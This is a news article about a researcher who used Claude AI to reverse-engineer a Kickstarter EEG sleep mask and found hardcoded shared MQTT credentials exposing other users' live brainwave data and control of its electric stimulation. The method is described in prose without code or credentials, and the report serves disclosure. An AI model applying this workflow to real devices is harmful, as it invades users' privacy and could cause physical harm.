A Kickstarter-funded smart sleep mask with EEG capabilities was found broadcasting users' brainwaves to an open MQTT broker, allowing unauthorized access to sensitive biometric data and even the ability to send electric impulses to sleeping users.
A smart sleep mask purchased from Kickstarter has exposed a significant security vulnerability that allowed unauthorized access to users' brainwave data and even the ability to send electric impulses during sleep. The device, manufactured by a small Chinese research company, combines EEG brain monitoring, electrical muscle stimulation, vibration, heating, and audio capabilities in a single wearable.
Discovery Through Reverse Engineering
The security researcher, who wishes to remain anonymous, initially purchased the mask to address connectivity issues with the official app. What began as a simple attempt to build a custom control panel quickly evolved into a comprehensive security audit.
Using Claude AI (Opus 4.6), the researcher first attempted to reverse-engineer the Bluetooth Low Energy protocol. After scanning for nearby BLE devices and mapping the interface, they discovered two data channels - one for sending commands and one for streaming data. Despite trying hundreds of command patterns including Modbus frames, JSON, and various byte structures, the device remained unresponsive to standard protocols.
The App Analysis Breakthrough
The real breakthrough came from analyzing the Android application. Built with Flutter, the app presented unique challenges since Flutter compiles Dart source code into native ARM64 machine code rather than traditional Java bytecode. However, the compiled binary still contained readable strings.
Among thousands of lines of Flutter framework noise, the researcher discovered:
- Hardcoded credentials for the company's MQTT message broker (shared across all app installations)
- Cloud API endpoints
- Fifteen command builder function names for controlling various features
- Protocol debug messages revealing packet structure
Using blutter, a tool specifically designed for decompiling Flutter's compiled Dart snapshots, the researcher reconstructed the functions with readable annotations and mapped out all fifteen commands.
The MQTT Security Breach
With the hardcoded credentials, connecting to the company's MQTT broker was trivial. MQTT (Message Queuing Telemetry Transport) is a pub/sub messaging system standard in IoT applications where devices publish sensor readings and subscribe to commands.
Once connected, the researcher discovered they weren't just receiving data from their own device - they were receiving data from approximately 25 active devices worldwide. The exposed data included:
- Live EEG brainwave data from sleep masks
- Air quality monitor readings (temperature, humidity, CO2)
- Presence sensor data detecting room occupancy
Analysis of the brainwave data revealed distinct sleep patterns. One user appeared to be in REM sleep, showing mixed-frequency activity, while another was in deep slow-wave sleep with strong delta power below 4Hz.
The Electric Stimulation Vulnerability
Perhaps most concerning was the discovery that the same credentials allowing access to brainwave data also enabled control over the mask's electrical muscle stimulation (EMS) feature. The EMS function accepts parameters for mode, frequency, intensity, and duration - meaning an attacker could potentially send electric impulses to sleeping users.
Technical Implementation
The researcher successfully built a web dashboard with sliders controlling all mask functions, demonstrating complete control over the devices. The reverse engineering process, from Bluetooth analysis to MQTT discovery, was accomplished in approximately 30 minutes using Claude AI.
Disclosure and Implications
The researcher has reached out to the company to inform them of the security issues but has chosen not to publicly name the product or company at this time. This incident serves as a stark reminder of the importance of digital hygiene in an increasingly connected world.
The case highlights several critical security failures:
- Shared Credentials: Using the same MQTT credentials across all devices
- Unsecured Broker: No authentication or encryption for the MQTT connection
- Sensitive Data Exposure: Broadcasting biometric data without proper safeguards
- Bidirectional Control: Allowing command execution without device authentication
This vulnerability affects not just the sleep masks but potentially any IoT device using the same insecure architecture. The ability to monitor and potentially influence users' sleep states through brainwave data and electric stimulation represents a serious privacy and safety concern.
As AI-assisted reverse engineering becomes more accessible, the importance of robust security practices in IoT devices cannot be overstated. This incident demonstrates how quickly a determined researcher can uncover and exploit security weaknesses, even in relatively complex systems combining multiple wireless protocols and biometric sensors.
Comments
Please log in or register to join the discussion